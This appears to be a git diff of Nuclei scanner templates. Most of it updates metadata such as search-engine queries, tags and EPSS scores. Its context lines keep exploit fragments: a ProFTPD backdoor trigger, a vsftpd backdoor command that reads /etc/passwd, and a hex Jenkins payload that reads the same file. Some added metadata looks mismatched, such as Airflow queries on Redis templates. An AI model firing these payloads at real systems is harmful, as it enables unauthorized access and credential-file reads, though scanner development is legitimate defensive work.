b/http/vulnerabilities/wordpress/wp-slideshow-xss.yaml index 01a3211a3b..a65d1374c7 100644 --- a/http/vulnerabilities/wordpress/wp-slideshow-xss.yaml +++ b/http/vulnerabilities/wordpress/wp-slideshow-xss.yaml @@ -12,7 +12,7 @@ info: cvss-score: 7.2 cwe-id: CWE-79 metadata: - max-request: 1 + max-request: 2 tags: wordpress,xss,wp-plugin,edb flow: http(1) && http(2) diff --git a/http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml b/http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml index e671fc582f..475cac7c9f 100644 --- a/http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml +++ b/http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml @@ -11,7 +11,7 @@ info: - https://packetstormsecurity.com/files/161576/ metadata: verified: true - max-request: 1 + max-request: 2 tags: ssrf,wp,wp-plugin,wordpress,unauth,wpscan,packetstorm flow: http(1) && http(2) diff --git a/http/vulnerabilities/wordpress/wp-user-enum.yaml b/http/vulnerabilities/wordpress/wp-user-enum.yaml index 05f5bece68..ee398dd389 100644 --- a/http/vulnerabilities/wordpress/wp-user-enum.yaml +++ b/http/vulnerabilities/wordpress/wp-user-enum.yaml @@ -21,7 +21,10 @@ info: max-request: 2 vendor: wordpress product: wordpress - shodan-query: http.component:"WordPress" + shodan-query: + - http.component:"WordPress" + - http.component:"wordpress" + - cpe:"cpe:2.3:a:wordpress:wordpress" tags: cve2017,cve,wordpress,wp,edb http: diff --git a/javascript/backdoor/proftpd-backdoor.yaml b/javascript/backdoor/proftpd-backdoor.yaml index 2275724aee..0f09665642 100644 --- a/javascript/backdoor/proftpd-backdoor.yaml +++ b/javascript/backdoor/proftpd-backdoor.yaml @@ -10,9 +10,9 @@ info: - https://github.com/shafdo/ProFTPD-1.3.3c-Backdoor_Command_Execution_Automated_Script/blob/main/README.md - https://www.rapid7.com/db/modules/exploit/unix/ftp/proftpd_133c_backdoor/ metadata: - shodan-query: product:"ProFTPD" + max-request: 1 + shodan-query: "product:\"ProFTPD\"" tags: js,network,proftpd,ftp,backdoor - javascript: - code: | const data = ["HELP ACIDBITCHEZ\n", "id"]; diff --git a/javascript/cves/2012/CVE-2012-2122.yaml b/javascript/cves/2012/CVE-2012-2122.yaml index f303e06e97..4e94765daa 100644 --- a/javascript/cves/2012/CVE-2012-2122.yaml +++ b/javascript/cves/2012/CVE-2012-2122.yaml @@ -17,16 +17,18 @@ info: cvss-score: 5.1 cve-id: CVE-2012-2122 cwe-id: CWE-287 - epss-score: 0.97019 - epss-percentile: 0.99732 + epss-score: 0.9681 + epss-percentile: 0.99685 cpe: cpe:2.3:a:oracle:mysql:5.1.51:*:*:*:*:*:*:* metadata: verified: true + max-request: 1 vendor: oracle product: mysql - shodan-query: product:"MySQL" - tags: cve,cve2012,js,enum,network,mssql,fuzz - + shodan-query: + - "product:\"MySQL\"" + - product:"mysql" + tags: cve,cve2012,js,enum,network,mssql,fuzz,oracle javascript: - code: | const mysql = require('nuclei/mysql'); diff --git a/javascript/cves/2019/CVE-2019-9193.yaml b/javascript/cves/2019/CVE-2019-9193.yaml index 7d32efc03f..1151cddc0f 100644 --- a/javascript/cves/2019/CVE-2019-9193.yaml +++ b/javascript/cves/2019/CVE-2019-9193.yaml @@ -9,10 +9,10 @@ info: reference: - https://github.com/vulhub/vulhub/tree/master/postgres/CVE-2019-9193 metadata: - shodan-query: product:"PostgreSQL" verified: true + max-request: 1 + shodan-query: "product:\"PostgreSQL\"" tags: cve,cve2018,js,network,postgresql,intrusive - javascript: - code: | const postgres = require('nuclei/postgres'); diff --git a/javascript/cves/2020/CVE-2020-7247.yaml b/javascript/cves/2020/CVE-2020-7247.yaml index 0ee8c36b70..6a090b2ed2 100644 --- a/javascript/cves/2020/CVE-2020-7247.yaml +++ b/javascript/cves/2020/CVE-2020-7247.yaml @@ -24,11 +24,10 @@ info: epss-percentile: 0.9998 cpe: cpe:2.3:a:openbsd:opensmtpd:6.6:*:*:*:*:*:*:* metadata: - max-request: 2 + max-request: 1 vendor: openbsd product: opensmtpd - tags: packetstorm,cve,cve2020,js,smtp,opensmtpd,network,rce,oast,kev - + tags: packetstorm,cve,cve2020,js,smtp,opensmtpd,network,rce,oast,kev,openbsd javascript: - code: | const smtp = require('nuclei/smtp'); diff --git a/javascript/cves/2023/CVE-2023-34039.yaml b/javascript/cves/2023/CVE-2023-34039.yaml index c83d8c7995..87aebf4ff8 100644 --- a/javascript/cves/2023/CVE-2023-34039.yaml +++ b/javascript/cves/2023/CVE-2023-34039.yaml @@ -29,7 +29,7 @@ info: verified: true vendor: vmware product: aria_operations_for_networks - tags: js,packetstorm,cve,cve2019,vmware,aria,rce,fuzz,vrealize + tags: js,packetstorm,cve,vmware,aria,rce,fuzz,vrealize,cve2023 variables: keysDir: "helpers/payloads/cve-2023-34039-keys" # load all private keys from this directory diff --git a/javascript/cves/2023/CVE-2023-46604.yaml b/javascript/cves/2023/CVE-2023-46604.yaml index 926ccba63a..f0e9996001 100644 --- a/javascript/cves/2023/CVE-2023-46604.yaml +++ b/javascript/cves/2023/CVE-2023-46604.yaml @@ -26,7 +26,10 @@ info: max-request: 1 vendor: apache product: activemq - shodan-query: product:"ActiveMQ OpenWire Transport" + shodan-query: + - product:"ActiveMQ OpenWire Transport" + - cpe:"cpe:2.3:a:apache:activemq" + - product:"activemq openwire transport" tags: cve,cve2023,network,rce,apache,activemq,deserialization,js,kev variables: prefix: "1f00000000000000000001010042" diff --git a/javascript/cves/2023/CVE-2023-48795.yaml b/javascript/cves/2023/CVE-2023-48795.yaml index 497864c2cf..082fa0bcb0 100644 --- a/javascript/cves/2023/CVE-2023-48795.yaml +++ b/javascript/cves/2023/CVE-2023-48795.yaml @@ -27,9 +27,11 @@ info: max-request: 1 vendor: openbsd product: openssh - shodan-query: product:"OpenSSH" - tags: cve,cve2023,packetstorm,seclists,js,ssh,network,passive - + shodan-query: + - product:"OpenSSH" + - product:"openssh" + - cpe:"cpe:2.3:a:openbsd:openssh" + tags: cve,cve2023,packetstorm,seclists,js,ssh,network,passive,openbsd javascript: - code: | const m = require("nuclei/ssh"); diff --git a/javascript/cves/2024/CVE-2024-23897.yaml b/javascript/cves/2024/CVE-2024-23897.yaml index ef4476d1a7..09e4964c87 100644 --- a/javascript/cves/2024/CVE-2024-23897.yaml +++ b/javascript/cves/2024/CVE-2024-23897.yaml @@ -24,9 +24,13 @@ info: max-request: 1 vendor: jenkins product: jenkins - shodan-query: "product:\"Jenkins\"" + shodan-query: + - "product:\"Jenkins\"" + - cpe:"cpe:2.3:a:jenkins:jenkins" + - http.favicon.hash:81586312 + - product:"jenkins" + fofa-query: icon_hash=81586312 tags: cve,cve2024,lfi,rce,jenkins,js - variables: payload: "{{hex_decode('0000000e00000c636f6e6e6563742d6e6f64650000000e00000c402f6574632f706173737764000000070200055554462d3800000007010005656e5f41450000000003')}}" diff --git a/javascript/default-logins/redis-default-logins.yaml b/javascript/default-logins/redis-default-logins.yaml index b4d15c1ef7..dc7d3a7f10 100644 --- a/javascript/default-logins/redis-default-logins.yaml +++ b/javascript/default-logins/redis-default-logins.yaml @@ -8,9 +8,20 @@ info: Redis service was accessed with easily guessed credentials. metadata: max-request: 6 - shodan-query: product:"redis" + shodan-query: + - product:"redis" + - http.title:"airflow - dags" || http.html:"apache airflow" + - http.title:"sign in - airflow" + product: airflow + vendor: apache + fofa-query: + - apache airflow + - title="airflow - dags" || http.html:"apache airflow" + - title="sign in - airflow" + google-query: + - intitle:"airflow - dags" || http.html:"apache airflow" + - intitle:"sign in - airflow" tags: js,redis,default-login,network - javascript: - pre-condition: | isPortOpen(Host,Port) diff --git a/javascript/detection/samba-detect.yaml b/javascript/detection/samba-detect.yaml index ddde28229d..bfdff123ae 100644 --- a/javascript/detection/samba-detect.yaml +++ b/javascript/detection/samba-detect.yaml @@ -9,8 +9,9 @@ info: metadata: max-request: 1 shodan-query: "port:445" + product: dionaea + vendor: dionaea tags: js,network,samba,detect,linux - javascript: - code: | let m = require("nuclei/smb"); diff --git a/javascript/enumeration/checkpoint-firewall-enum.yaml b/javascript/enumeration/checkpoint-firewall-enum.yaml index 358c270263..3f4f071528 100644 --- a/javascript/enumeration/checkpoint-firewall-enum.yaml +++ b/javascript/enumeration/checkpoint-firewall-enum.yaml @@ -8,7 +8,8 @@ info: - https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/gather/checkpoint_hostname.rb metadata: verfied: true - shodan-query: product:"Check Point Firewall" + shodan-query: "product:\"Check Point Firewall\"" + max-request: 1 tags: js,network,firewall,checkpoint,enum javascript: diff --git a/javascript/enumeration/minecraft-enum.yaml b/javascript/enumeration/minecraft-enum.yaml index aae2507b33..4db827a462 100644 --- a/javascript/enumeration/minecraft-enum.yaml +++ b/javascript/enumeration/minecraft-enum.yaml @@ -9,11 +9,10 @@ info: reference: - https://github.com/sjhilt/Nmap-NSEs/blob/master/minecraft-info.nse metadata: + verified: true max-request: 1 shodan-query: product:"Minecraft" - verified: true tags: js,network,minecraft,enum - javascript: - code: | let data = "fe01" diff --git a/javascript/enumeration/mysql/mysql-default-login.yaml b/javascript/enumeration/mysql/mysql-default-login.yaml index 687207551e..7a48346b80 100644 --- a/javascript/enumeration/mysql/mysql-default-login.yaml +++ b/javascript/enumeration/mysql/mysql-default-login.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 21 shodan-query: "port:3306" - tags: js,mysql,default-login,network,fuzz + tags: js,mysql,default-login,network,fuzz,enum javascript: - pre-condition: | diff --git a/javascript/enumeration/mysql/mysql-info.yaml b/javascript/enumeration/mysql/mysql-info.yaml index 3d3c169f02..9cb991cce2 100644 --- a/javascript/enumeration/mysql/mysql-info.yaml +++ b/javascript/enumeration/mysql/mysql-info.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: "port:3306" - tags: js,mssql,network + tags: js,mssql,network,enum javascript: - code: | var m = require("nuclei/mysql"); diff --git a/javascript/enumeration/pgsql/pgsql-default-db.yaml b/javascript/enumeration/pgsql/pgsql-default-db.yaml index 70df51efb9..adb38586a0 100644 --- a/javascript/enumeration/pgsql/pgsql-default-db.yaml +++ b/javascript/enumeration/pgsql/pgsql-default-db.yaml @@ -9,10 +9,10 @@ info: reference: - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-database-name metadata: - shodan-query: product:"PostgreSQL" verified: true - tags: js,network,postgresql,authenticated - + max-request: 40 + shodan-query: "product:\"PostgreSQL\"" + tags: js,network,postgresql,authenticated,enum javascript: - code: | const postgres = require('nuclei/postgres'); diff --git a/javascript/enumeration/pgsql/pgsql-file-read.yaml b/javascript/enumeration/pgsql/pgsql-file-read.yaml index 39afac42e9..878ab89f27 100644 --- a/javascript/enumeration/pgsql/pgsql-file-read.yaml +++ b/javascript/enumeration/pgsql/pgsql-file-read.yaml @@ -9,10 +9,10 @@ info: reference: - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-file-read metadata: - shodan-query: product:"PostgreSQL" verified: true - tags: js,network,postgresql,authenticated - + max-request: 8 + shodan-query: "product:\"PostgreSQL\"" + tags: js,network,postgresql,authenticated,enum javascript: - code: | const postgres = require('nuclei/postgres'); diff --git a/javascript/enumeration/pgsql/pgsql-list-database.yaml b/javascript/enumeration/pgsql/pgsql-list-database.yaml index b0803bd40d..e048b7896e 100644 --- a/javascript/enumeration/pgsql/pgsql-list-database.yaml +++ b/javascript/enumeration/pgsql/pgsql-list-database.yaml @@ -10,10 +10,10 @@ info: - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-password-hashes - https://launchbylunch.com/posts/2024/Jan/16/postgres-password-encryption/#postgresql-password-encryption-scram-sha-256 metadata: - shodan-query: product:"PostgreSQL" verified: true - tags: js,network,postgresql,authenticated - + max-request: 8 + shodan-query: "product:\"PostgreSQL\"" + tags: js,network,postgresql,authenticated,enum javascript: - code: | const postgres = require('nuclei/postgres'); diff --git a/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml b/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml index ff99680e81..b038eff825 100644 --- a/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml +++ b/javascript/enumeration/pgsql/pgsql-list-password-hashes.yaml @@ -11,10 +11,10 @@ info: - https://launchbylunch.com/posts/2024/Jan/16/postgres-password-encryption/#postgresql-password-encryption-scram-sha-256 - https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/auxiliary/scanner/postgres/postgres_hashdump.md metadata: - shodan-query: product:"PostgreSQL" verified: true - tags: js,network,postgresql,authenticated - + max-request: 8 + shodan-query: "product:\"PostgreSQL\"" + tags: js,network,postgresql,authenticated,enum javascript: - code: | const postgres = require('nuclei/postgres'); diff --git a/javascript/enumeration/pgsql/pgsql-list-users.yaml b/javascript/enumeration/pgsql/pgsql-list-users.yaml index 176dfd9d72..ed6f321d8a 100644 --- a/javascript/enumeration/pgsql/pgsql-list-users.yaml +++ b/javascript/enumeration/pgsql/pgsql-list-users.yaml @@ -9,10 +9,10 @@ info: reference: - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-list-users metadata: - shodan-query: product:"PostgreSQL" verified: true + max-request: 8 + shodan-query: "product:\"PostgreSQL\"" tags: js,network,postgresql,enum,authenticated - javascript: - code: | const postgres = require('nuclei/postgres'); diff --git a/javascript/enumeration/pgsql/pgsql-version-detect.yaml b/javascript/enumeration/pgsql/pgsql-version-detect.yaml index cbbbdccf98..08714c8d32 100644 --- a/javascript/enumeration/pgsql/pgsql-version-detect.yaml +++ b/javascript/enumeration/pgsql/pgsql-version-detect.yaml @@ -9,10 +9,10 @@ info: reference: - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#postgresql-version metadata: - shodan-query: product:"PostgreSQL" verified: true + max-request: 8 + shodan-query: "product:\"PostgreSQL\"" tags: js,network,postgresql,enum,authenticated - javascript: - code: | const postgres = require('nuclei/postgres'); diff --git a/javascript/enumeration/pop3/pop3-capabilities-enum.yaml b/javascript/enumeration/pop3/pop3-capabilities-enum.yaml index e86f426477..510a59f3be 100644 --- a/javascript/enumeration/pop3/pop3-capabilities-enum.yaml +++ b/javascript/enumeration/pop3/pop3-capabilities-enum.yaml @@ -9,11 +9,10 @@ info: reference: - https://nmap.org/nsedoc/scripts/pop3-capabilities.html metadata: + verified: true max-request: 1 shodan-query: "port:110" - verified: true tags: js,network,pop3,enum - javascript: - code: | let data = "CAPA\r\n" diff --git a/javascript/enumeration/redis/redis-info.yaml b/javascript/enumeration/redis/redis-info.yaml index fbd62fb967..8ab3106dbd 100644 --- a/javascript/enumeration/redis/redis-info.yaml +++ b/javascript/enumeration/redis/redis-info.yaml @@ -10,9 +10,20 @@ info: - https://nmap.org/nsedoc/scripts/redis-info.html metadata: max-request: 1 - shodan-query: product:"redis" - tags: js,redis,network - + shodan-query: + - product:"redis" + - http.title:"airflow - dags" || http.html:"apache airflow" + - http.title:"sign in - airflow" + product: airflow + vendor: apache + fofa-query: + - apache airflow + - title="airflow - dags" || http.html:"apache airflow" + - title="sign in - airflow" + google-query: + - intitle:"airflow - dags" || http.html:"apache airflow" + - intitle:"sign in - airflow" + tags: js,redis,network,enum javascript: - code: | const redis = require('nuclei/redis'); diff --git a/javascript/enumeration/redis/redis-require-auth.yaml b/javascript/enumeration/redis/redis-require-auth.yaml index 933d643384..84c8c76f26 100644 --- a/javascript/enumeration/redis/redis-require-auth.yaml +++ b/javascript/enumeration/redis/redis-require-auth.yaml @@ -10,9 +10,20 @@ info: - https://docs.projectdiscovery.io/templates/protocols/javascript/modules/redis#isauthenticated metadata: max-request: 1 - shodan-query: product:"redis" - tags: js,redis,network - + shodan-query: + - product:"redis" + - http.title:"airflow - dags" || http.html:"apache airflow" + - http.title:"sign in - airflow" + product: airflow + vendor: apache + fofa-query: + - apache airflow + - title="airflow - dags" || http.html:"apache airflow" + - title="sign in - airflow" + google-query: + - intitle:"airflow - dags" || http.html:"apache airflow" + - intitle:"sign in - airflow" + tags: js,redis,network,enum javascript: - code: | const redis = require('nuclei/redis'); diff --git a/javascript/enumeration/rsync/rsync-list-modules.yaml b/javascript/enumeration/rsync/rsync-list-modules.yaml index c7f1f4e9c3..785d2a7974 100644 --- a/javascript/enumeration/rsync/rsync-list-modules.yaml +++ b/javascript/enumeration/rsync/rsync-list-modules.yaml @@ -10,10 +10,9 @@ info: - https://nmap.org/nsedoc/scripts/rsync-list-modules.html metadata: verified: true - shodan-query: port:873 max-request: 1 - tags: network,rsync,enum - + shodan-query: port:873 + tags: network,rsync,enum,js javascript: - code: | const c = require("nuclei/net"); diff --git a/javascript/enumeration/smb/smb-default-creds.yaml b/javascript/enumeration/smb/smb-default-creds.yaml index c780d674b0..7830a24b49 100644 --- a/javascript/enumeration/smb/smb-default-creds.yaml +++ b/javascript/enumeration/smb/smb-default-creds.yaml @@ -12,8 +12,9 @@ info: verified: true max-request: 9 shodan-query: "port:445" + product: dionaea + vendor: dionaea tags: js,network,smb,enum,default,bruteforce - javascript: - code: | var m = require("nuclei/smb"); diff --git a/javascript/enumeration/smb/smb-enum-domains.yaml b/javascript/enumeration/smb/smb-enum-domains.yaml index 567ab2d3a3..b66477cc2d 100644 --- a/javascript/enumeration/smb/smb-enum-domains.yaml +++ b/javascript/enumeration/smb/smb-enum-domains.yaml @@ -12,6 +12,8 @@ info: verified: true max-request: 1 shodan-query: port:445 + product: dionaea + vendor: dionaea tags: js,network,smb,enum javascript: - code: | diff --git a/javascript/enumeration/smb/smb-enum.yaml b/javascript/enumeration/smb/smb-enum.yaml index 628c6c0237..6f689a7616 100644 --- a/javascript/enumeration/smb/smb-enum.yaml +++ b/javascript/enumeration/smb/smb-enum.yaml @@ -13,8 +13,9 @@ info: verified: true max-request: 1 shodan-query: port:445 + product: dionaea + vendor: dionaea tags: js,network,smb,enum - javascript: - code: | var m = require("nuclei/smb"); diff --git a/javascript/enumeration/smb/smb-os-detect.yaml b/javascript/enumeration/smb/smb-os-detect.yaml index 59b4d0ada9..89c2dc17b0 100644 --- a/javascript/enumeration/smb/smb-os-detect.yaml +++ b/javascript/enumeration/smb/smb-os-detect.yaml @@ -11,6 +11,8 @@ info: metadata: max-request: 1 shodan-query: "port:445" + product: dionaea + vendor: dionaea tags: js,network,smb,enum,os javascript: - code: | diff --git a/javascript/enumeration/smb/smb-version-detect.yaml b/javascript/enumeration/smb/smb-version-detect.yaml index d9a5febdf5..e685879ca4 100644 --- a/javascript/enumeration/smb/smb-version-detect.yaml +++ b/javascript/enumeration/smb/smb-version-detect.yaml @@ -9,6 +9,8 @@ info: metadata: max-request: 1 shodan-query: "port:445" + product: dionaea + vendor: dionaea tags: js,network,smb,enum javascript: - code: | diff --git a/javascript/enumeration/smb/smb2-capabilities.yaml b/javascript/enumeration/smb/smb2-capabilities.yaml index 5cac17bd03..c5f650b03c 100644 --- a/javascript/enumeration/smb/smb2-capabilities.yaml +++ b/javascript/enumeration/smb/smb2-capabilities.yaml @@ -11,8 +11,9 @@ info: metadata: max-request: 1 shodan-query: port:445 + product: dionaea + vendor: dionaea tags: js,network,smb,enum - javascript: - code: | var m = require("nuclei/smb"); diff --git a/javascript/enumeration/smb/smb2-server-time.yaml b/javascript/enumeration/smb/smb2-server-time.yaml index 79a88597c4..643706024f 100644 --- a/javascript/enumeration/smb/smb2-server-time.yaml +++ b/javascript/enumeration/smb/smb2-server-time.yaml @@ -12,6 +12,8 @@ info: verified: true max-request: 1 shodan-query: "port:445" + product: dionaea + vendor: dionaea tags: js,network,smb,enum javascript: - code: | diff --git a/javascript/misconfiguration/pgsql/pgsql-empty-password.yaml b/javascript/misconfiguration/pgsql/pgsql-empty-password.yaml index 33be6e165f..4679a87052 100644 --- a/javascript/misconfiguration/pgsql/pgsql-empty-password.yaml +++ b/javascript/misconfiguration/pgsql/pgsql-empty-password.yaml @@ -9,10 +9,10 @@ info: reference: - https://www.tenable.com/plugins/nessus/104031 metadata: - shodan-query: product:"PostgreSQL" verified: true + max-request: 1 + shodan-query: "product:\"PostgreSQL\"" tags: js,network,postgresql,authenticated - javascript: - code: | const postgres = require('nuclei/postgres'); diff --git a/javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml b/javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml index 9f2deb4d9c..e68933dcb5 100644 --- a/javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml +++ b/javascript/misconfiguration/pgsql/pgsql-extensions-rce.yaml @@ -11,10 +11,10 @@ info: - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md#using-libcso6 - https://hacktricks.boitatech.com.br/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions metadata: - shodan-query: product:"PostgreSQL" verified: true + max-request: 1 + shodan-query: "product:\"PostgreSQL\"" tags: postgresql,js,network,rce - javascript: - code: | const postgres = require('nuclei/postgres'); diff --git a/javascript/misconfiguration/smb/smb-anonymous-access.yaml b/javascript/misconfiguration/smb/smb-anonymous-access.yaml index a6fbf3ab5a..d944b35ba8 100644 --- a/javascript/misconfiguration/smb/smb-anonymous-access.yaml +++ b/javascript/misconfiguration/smb/smb-anonymous-access.yaml @@ -12,6 +12,8 @@ info: verified: true max-request: 1 shodan-query: port:445 + product: dionaea + vendor: dionaea tags: js,network,smb,enum,misconfig javascript: - code: | diff --git a/javascript/misconfiguration/smb/smb-shares.yaml b/javascript/misconfiguration/smb/smb-shares.yaml index fb0194af93..f024f4edf3 100644 --- a/javascript/misconfiguration/smb/smb-shares.yaml +++ b/javascript/misconfiguration/smb/smb-shares.yaml @@ -12,6 +12,8 @@ info: verified: true max-request: 1 shodan-query: port:445 + product: dionaea + vendor: dionaea tags: js,network,smb,enum javascript: - code: | diff --git a/javascript/misconfiguration/smb/smb-signing-not-required.yaml b/javascript/misconfiguration/smb/smb-signing-not-required.yaml index 66e9b13f22..822f70b5f1 100644 --- a/javascript/misconfiguration/smb/smb-signing-not-required.yaml +++ b/javascript/misconfiguration/smb/smb-signing-not-required.yaml @@ -13,6 +13,8 @@ info: verified: true max-request: 1 shodan-query: port:445 + product: dionaea + vendor: dionaea tags: js,network,smb,enum javascript: - code: | diff --git a/javascript/udp/detection/tftp-detect.yaml b/javascript/udp/detection/tftp-detect.yaml index 4fa3ae1353..a67707ee43 100644 --- a/javascript/udp/detection/tftp-detect.yaml +++ b/javascript/udp/detection/tftp-detect.yaml @@ -8,9 +8,9 @@ info: Detect TFTP Service. metadata: verified: true - shodan-query: port:69 + max-request: 1 + shodan-query: "port:69" tags: js,tftp,udp,network - javascript: - code: | let packet = bytes.NewBuffer(); diff --git a/network/backdoor/backdoored-zte.yaml b/network/backdoor/backdoored-zte.yaml index 7515aa50d6..e9ce27c899 100644 --- a/network/backdoor/backdoored-zte.yaml +++ b/network/backdoor/backdoored-zte.yaml @@ -13,11 +13,10 @@ info: cvss-score: 10 cwe-id: CWE-912 metadata: + verified: true max-request: 1 shodan-query: http.html:"ZTE Corporation" - verified: true - tags: edb,network,zte,telnet,backdoor,router - + tags: edb,network,zte,telnet,backdoor,router,tcp tcp: - host: - "{{Hostname}}" diff --git a/network/c2/darkcomet-trojan.yaml b/network/c2/darkcomet-trojan.yaml index 54644dbf4f..47b869ad69 100644 --- a/network/c2/darkcomet-trojan.yaml +++ b/network/c2/darkcomet-trojan.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: product:'DarkComet Trojan' - tags: network,c2,ir,osint,cti,darkcomet + tags: network,c2,ir,osint,cti,darkcomet,tcp tcp: - inputs: diff --git a/network/c2/darktrack-rat-trojan.yaml b/network/c2/darktrack-rat-trojan.yaml index 58dcfa2785..99be59b8bb 100644 --- a/network/c2/darktrack-rat-trojan.yaml +++ b/network/c2/darktrack-rat-trojan.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: product:'DarkTrack RAT Trojan' - tags: network,c2,ir,osint,cti,darktrack,rat + tags: network,c2,ir,osint,cti,darktrack,rat,tcp tcp: - inputs: diff --git a/network/c2/orcus-rat-trojan.yaml b/network/c2/orcus-rat-trojan.yaml index 596f5cbb52..9c095a75ec 100644 --- a/network/c2/orcus-rat-trojan.yaml +++ b/network/c2/orcus-rat-trojan.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: product:'Orcus RAT Trojan' - tags: network,c2,ir,osint,cti,orcus,rat + tags: network,c2,ir,osint,cti,orcus,rat,tcp tcp: - inputs: diff --git a/network/c2/xtremerat-trojan.yaml b/network/c2/xtremerat-trojan.yaml index 2ea34e8eca..9b032933af 100644 --- a/network/c2/xtremerat-trojan.yaml +++ b/network/c2/xtremerat-trojan.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: product:'XtremeRAT Trojan' - tags: network,c2,ir,osint,cti,xtreamerat + tags: network,c2,ir,osint,cti,xtreamerat,tcp tcp: - inputs: diff --git a/network/cves/2001/CVE-2001-1473.yaml b/network/cves/2001/CVE-2001-1473.yaml index ecb7eb0621..51030400d8 100644 --- a/network/cves/2001/CVE-2001-1473.yaml +++ b/network/cves/2001/CVE-2001-1473.yaml @@ -5,24 +5,26 @@ info: author: iamthefrogy severity: high description: SSHv1 is deprecated and has known cryptographic issues. + remediation: Upgrade to SSH 2.4 or later. reference: - https://www.kb.cert.org/vuls/id/684820 - https://nvd.nist.gov/vuln/detail/CVE-2001-1473 - http://www.kb.cert.org/vuls/id/684820 - https://exchange.xforce.ibmcloud.com/vulnerabilities/6603 - remediation: Upgrade to SSH 2.4 or later. + - https://github.com/codine7/jungle classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P cvss-score: 7.5 cve-id: CVE-2001-1473 cwe-id: CWE-310 - cpe: cpe:2.3:a:ssh:ssh:1.2.24:*:*:*:*:*:*:* epss-score: 0.00258 + epss-percentile: 0.65484 + cpe: cpe:2.3:a:ssh:ssh:1.2.24:*:*:*:*:*:*:* metadata: max-request: 1 - product: ssh vendor: ssh - tags: network,cve2001,cve,ssh,openssh + product: ssh + tags: network,cve2001,cve,ssh,openssh,tcp tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2011/CVE-2011-2523.yaml b/network/cves/2011/CVE-2011-2523.yaml index 2991dbe5a7..5949e837f6 100644 --- a/network/cves/2011/CVE-2011-2523.yaml +++ b/network/cves/2011/CVE-2011-2523.yaml @@ -21,7 +21,8 @@ info: cvss-score: 9.8 cve-id: CVE-2011-2523 cwe-id: CWE-78 - epss-score: 0.87236 + epss-score: 0.85861 + epss-percentile: 0.98557 cpe: cpe:2.3:a:vsftpd_project:vsftpd:2.3.4:*:*:*:*:*:*:* metadata: verified: true @@ -29,7 +30,7 @@ info: vendor: vsftpd_project product: vsftpd shodan-query: product:"vsftpd" - tags: cve2011,network,cve,vsftpd,ftp,backdoor,vsftpd_project + tags: packetstorm,cve2011,network,cve,vsftpd,ftp,backdoor,vsftpd_project,tcp variables: cmd: "cat /etc/passwd" # shows the the user and group names and numeric IDs tcp: diff --git a/network/cves/2015/CVE-2015-3306.yaml b/network/cves/2015/CVE-2015-3306.yaml index 76be3c6f5c..aa7c1c8884 100644 --- a/network/cves/2015/CVE-2015-3306.yaml +++ b/network/cves/2015/CVE-2015-3306.yaml @@ -19,13 +19,15 @@ info: cvss-score: 10 cve-id: CVE-2015-3306 cwe-id: CWE-284 + epss-score: 0.97091 + epss-percentile: 0.99775 cpe: cpe:2.3:a:proftpd:proftpd:1.3.5:*:*:*:*:*:*:* - epss-score: 0.97267 metadata: max-request: 1 - product: proftpd vendor: proftpd - tags: cve2015,cve,network,ftp,rce,proftpd,edb + product: proftpd + shodan-query: cpe:"cpe:2.3:a:proftpd:proftpd" + tags: cve2015,cve,network,ftp,rce,proftpd,edb,tcp tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2016/CVE-2016-2004.yaml b/network/cves/2016/CVE-2016-2004.yaml index ea7e238e3a..5813c46ebb 100644 --- a/network/cves/2016/CVE-2016-2004.yaml +++ b/network/cves/2016/CVE-2016-2004.yaml @@ -27,7 +27,7 @@ info: max-request: 2 vendor: hp product: data_protector - tags: packetstorm,cve,cve2016,network,iot,hp,rce,edb + tags: packetstorm,cve,cve2016,network,iot,hp,rce,edb,tcp tcp: - host: - "{{Hostname}}" diff --git a/network/cves/2016/CVE-2016-3510.yaml b/network/cves/2016/CVE-2016-3510.yaml index 64e8374d4e..66c42943ab 100644 --- a/network/cves/2016/CVE-2016-3510.yaml +++ b/network/cves/2016/CVE-2016-3510.yaml @@ -19,15 +19,20 @@ info: cvss-score: 9.8 cve-id: CVE-2016-3510 cwe-id: CWE-119 - epss-score: 0.04254 - epss-percentile: 0.92018 + epss-score: 0.04407 + epss-percentile: 0.92379 cpe: cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: oracle product: weblogic_server - tags: packetstorm,cve,cve2016,oracle,weblogic,t3,rce,oast,deserialization,network + shodan-query: + - product:"oracle weblogic" + - http.title:"oracle peoplesoft sign-in" + fofa-query: title="oracle peoplesoft sign-in" + google-query: intitle:"oracle peoplesoft sign-in" + tags: packetstorm,cve,cve2016,oracle,weblogic,t3,rce,oast,deserialization,network,tcp variables: start: 